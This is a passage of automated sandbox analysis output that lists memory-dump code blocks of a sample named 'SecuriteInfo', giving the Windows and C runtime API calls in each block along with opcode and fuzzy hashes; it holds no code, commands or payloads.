                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$_mallocstd::exception::exception
                                            • String ID: @-l .l$ILProtector
                                            • API String ID: 84431791-4089254471
                                            • Opcode ID: 1163fa9f0e252e42e71e53c6320b6acde9c76ec27ad549f518fe6c70a0458f53
                                            • Instruction ID: e605fd4598ee1dbbfc6ba361f6147492068bfcd420c655aafe1c7031c5840e3d
                                            • Opcode Fuzzy Hash: 1163fa9f0e252e42e71e53c6320b6acde9c76ec27ad549f518fe6c70a0458f53
                                            • Instruction Fuzzy Hash: D3713875E052599FCB14CFA8C984BEEBBB4FB59304F1081AED419A7740DB346A44CF91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: T@12
                                            • String ID: a0
                                            • API String ID: 456891419-3188653782
                                            • Opcode ID: c9d9c9bbd9903d9e8f95e14174af0e165bd3984c3b32323d6a9c3c00f399bf54
                                            • Instruction ID: 53ee02c774b21a092d3826e5533515c8c80750a4c371b3bc85267037b3994c75
                                            • Opcode Fuzzy Hash: c9d9c9bbd9903d9e8f95e14174af0e165bd3984c3b32323d6a9c3c00f399bf54
                                            • Instruction Fuzzy Hash: 9B112770D4169269DB309E778C4CFAF7ABC9B8179DF319418A475EBB40D734C542CAA0
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA913B
                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEA915C
                                            • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6CEA9170
                                            • LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CEA9191
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave
                                            • String ID:
                                            • API String ID: 3168844106-0
                                            • Opcode ID: 8767b5e106ceca6ad5aeed1808d69e2c189d0fdb7c1684d2f904b944e0b7de2d
                                            • Instruction ID: 7a510071b2adfe7fafe780683cf7a9ad9806d98c819499c9ec4c97d256f5925f
                                            • Opcode Fuzzy Hash: 8767b5e106ceca6ad5aeed1808d69e2c189d0fdb7c1684d2f904b944e0b7de2d
                                            • Instruction Fuzzy Hash: 0D4130B6900209DFCB04DFD9D9858EEBBB4FF88214B21855ED816AB710D731AA05CFA1
                                            APIs
                                            • EnterCriticalSection.KERNEL32 ref: 6CEA8E89
                                            • LeaveCriticalSection.KERNEL32(?,00000000), ref: 6CEA8EAD
                                            • _memset.LIBCMT ref: 6CEA8ED2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave_memset
                                            • String ID:
                                            • API String ID: 3751686142-0
                                            • Opcode ID: d04612499f0956959fc8420889f2fada44c65b9d5321612fdcc806669ef47816
                                            • Instruction ID: da08bb6941be5f324be0f9ada0d0ccf763d5724508c6aa53d88d28642e9e9e00
                                            • Opcode Fuzzy Hash: d04612499f0956959fc8420889f2fada44c65b9d5321612fdcc806669ef47816
                                            • Instruction Fuzzy Hash: E6515EB4601249AFC754CF58C890E9AB7B6FF49304F20855DE91A8BB81D731E956CB90
                                            APIs
                                            • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,?), ref: 6CEADA16
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6CEADA33
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEADA9E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$CreateDestroyElementVector
                                            • String ID:
                                            • API String ID: 3149346722-0
                                            • Opcode ID: 3a445bd07a709281174d359037afec8dc14702013b00a9e0542039a81b853f1c
                                            • Instruction ID: 922d00cbd6bf6677d43a37fe513c2d157e3cc55899af821fc05d27b32381c396
                                            • Opcode Fuzzy Hash: 3a445bd07a709281174d359037afec8dc14702013b00a9e0542039a81b853f1c
                                            • Instruction Fuzzy Hash: A6215CB9705206AFE701DFE9C880B9B77B8AF4A718F204059ED04DB740E771DA02CB60
                                            APIs
                                            • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CEAD949
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6CEAD96C
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEAD9CF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$CreateDestroyElementVector
                                            • String ID:
                                            • API String ID: 3149346722-0
                                            • Opcode ID: 6869da3c9ab327ff5acbe3a813068f56103bb2f4ae730dbec20e852f874eedf8
                                            • Instruction ID: 6472542c063674cfb4de4e1b8c3905eafb0e78a9e190e727b922b0948fd7301a
                                            • Opcode Fuzzy Hash: 6869da3c9ab327ff5acbe3a813068f56103bb2f4ae730dbec20e852f874eedf8
                                            • Instruction Fuzzy Hash: 76216D35601214AFEB01CF94C884BAA77B8EF8A718F214098ED45DF344D7B1DA02DBA1
                                            APIs
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBDB2D
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEBDB45
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEBDBA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$CreateDestroyElementVector
                                            • String ID:
                                            • API String ID: 3149346722-0
                                            • Opcode ID: 0b8fac67461b88815e1a0e34c72b7790bcbfcf1aac41a3625ea0e04ca45d8a0e
                                            • Instruction ID: 0ce5edb8eb2cd2fd0955b5ec227a63905096620a2611a321a10e55094bbba9aa
                                            • Opcode Fuzzy Hash: 0b8fac67461b88815e1a0e34c72b7790bcbfcf1aac41a3625ea0e04ca45d8a0e
                                            • Instruction Fuzzy Hash: 7811B279741205AFD700DF69C889FAABBB8FF5A314F158159E908EB701D730A900CBA0
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CEC4042
                                              • Part of subcall function 6CEF9533: std::exception::_Copy_str.LIBCMT ref: 6CEF954E
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC4059
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
                                              • Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
                                            • String ID:
                                            • API String ID: 2813683038-0
                                            • Opcode ID: b151abd4a183f9ae548fdb0d21ae877e5062cd6b6fffa00aaaa039ffab71a304
                                            • Instruction ID: fe127823ea6158e2b1399db89995cffd9adfc480ad7e4c497a2f7737a2ef49a2
                                            • Opcode Fuzzy Hash: b151abd4a183f9ae548fdb0d21ae877e5062cd6b6fffa00aaaa039ffab71a304
                                            • Instruction Fuzzy Hash: F491C1B19087049FD700CF99C842B9AFBF8EF81344F24895EE4649BBA0D7B1D5058B97
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEABE2D
                                            • IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6CEABE6D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroyReadSafe
                                            • String ID:
                                            • API String ID: 616443815-0
                                            • Opcode ID: 95f1c80b2cb60f3f3d9f7dbf65ee079c9d3230b1d3f33c157342ec49fd27a7da
                                            • Instruction ID: c9766e61b2fed6ddd2592b7126c1853fc67a7b64bec1070e3c0d0980576f095b
                                            • Opcode Fuzzy Hash: 95f1c80b2cb60f3f3d9f7dbf65ee079c9d3230b1d3f33c157342ec49fd27a7da
                                            • Instruction Fuzzy Hash: 5F71C1B4D0469E5EDB218EB58840659BBB1AF4A22CF3C839CD9E59BBD5C331D843CB50
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CEA6466
                                              • Part of subcall function 6CEF9533: std::exception::_Copy_str.LIBCMT ref: 6CEF954E
                                            • __CxxThrowException@8.LIBCMT ref: 6CEA647D
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                            • String ID:
                                            • API String ID: 2299493649-0
                                            • Opcode ID: 2a5c5acfd71f79d2c9010e38e7162e7c65c535ae37d70b7b038b703746585abe
                                            • Instruction ID: 08c53474baa18dcde90d59a9f2d0353b81ecd9ae29e47f72e17f3a59da49b24d
                                            • Opcode Fuzzy Hash: 2a5c5acfd71f79d2c9010e38e7162e7c65c535ae37d70b7b038b703746585abe
                                            • Instruction Fuzzy Hash: 955182B29093409FD700CF98C881A9ABBF4FB85744F60496EF5998B750D771D90ACB93
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CEBD3E8
                                            • __CxxThrowException@8.LIBCMT ref: 6CEBD3FF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                            • String ID:
                                            • API String ID: 4063778783-0
                                            • Opcode ID: 15b4f938b1fe855f397a43249e17de146f04b9b72f968f0c2fe752f58ad4c56e
                                            • Instruction ID: 79d2bafdd5d4cfff059a7357d66d3b030c154c33e1cecb8ef17c299fd4c73bb7
                                            • Opcode Fuzzy Hash: 15b4f938b1fe855f397a43249e17de146f04b9b72f968f0c2fe752f58ad4c56e
                                            • Instruction Fuzzy Hash: C53150755087059FC704CF28C48099AB7F5FF89714F608A1EF4559B750E735EA06CB92
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CEA8449
                                            • __CxxThrowException@8.LIBCMT ref: 6CEA845E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                            • String ID:
                                            • API String ID: 4063778783-0
                                            • Opcode ID: ae9c3501167a8960a13a6aeb9a2d9479fcce9618276161bfc54f1bc5943c6fec
                                            • Instruction ID: 7e1c427898e78fa862489d04af9b8c99680183ce5950966a12e2d5a17c7d161b
                                            • Opcode Fuzzy Hash: ae9c3501167a8960a13a6aeb9a2d9479fcce9618276161bfc54f1bc5943c6fec
                                            • Instruction Fuzzy Hash: 6301C8755002089FC708DF54D490CAABBB5EF58304B60C1AED92A4BB50DB30EA05CB95
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,?,00000000,6CEA8C13,?,6CEA8CD3,?,6CEA8C13,00000000,?,?,6CEA8C13,?,?), ref: 6CEA8D73
                                            • LeaveCriticalSection.KERNEL32(?,?,?,6CEA8CD3,?,6CEA8C13,00000000,?,?,6CEA8C13,?,?), ref: 6CEA8D8C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave
                                            • String ID:
                                            • API String ID: 3168844106-0
                                            • Opcode ID: 533f26d571ec7f42c282856b5b92c12924ab9fa7adc8cb95eae0c37428d5a658
                                            • Instruction ID: d2dc5ef1d2102d0b15a1eb7f1f3d68b9ca56af98999727c80a0608587f6c650b
                                            • Opcode Fuzzy Hash: 533f26d571ec7f42c282856b5b92c12924ab9fa7adc8cb95eae0c37428d5a658
                                            • Instruction Fuzzy Hash: B021FA75200109EF8B14DF89D890DAAB3BAFFC9314B258649F9198B750D731EE16CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TJbq$Te]q
                                            • API String ID: 0-3147309840
                                            • Opcode ID: 73bba79f6a5d989edb5cbddcc34e609f898bd4d4b7bab879642ab8122023e03e
                                            • Instruction ID: e9da1f8dd922aa24b6e3c01ec8cdcf95e3235f4881262519fc4b00d8fa140b53
                                            • Opcode Fuzzy Hash: 73bba79f6a5d989edb5cbddcc34e609f898bd4d4b7bab879642ab8122023e03e
                                            • Instruction Fuzzy Hash: DE21D330B082945FC716AB7894A56BE7FF6EF86200F1504EAD486DB3D3CA244D09C3B2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TJbq$Te]q
                                            • API String ID: 0-3147309840
                                            • Opcode ID: f98d2fa315ff84da8f1995012a6aa0c24a050b4ecdb206b1df6b37b2969dbb9b
                                            • Instruction ID: 0f0ef89fd14e981ea826b5d7a89c1e659131a5d5d7cfe94499fc6443f9fd13ee
                                            • Opcode Fuzzy Hash: f98d2fa315ff84da8f1995012a6aa0c24a050b4ecdb206b1df6b37b2969dbb9b
                                            • Instruction Fuzzy Hash: FB11C330B002155BCB14AFA8D454ABFBBB6EF88610F500469E505AB3D1CF719D4987E2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TJbq$Te]q
                                            • API String ID: 0-3147309840
                                            • Opcode ID: e8a8c489c5071f0c06e32681db31e6f060e228d72fed5bbed405986dd50c5deb
                                            • Instruction ID: 42f149dc6f608be5c9e914ac30defa6285363755616c89d1d7057d6aa12e4836
                                            • Opcode Fuzzy Hash: e8a8c489c5071f0c06e32681db31e6f060e228d72fed5bbed405986dd50c5deb
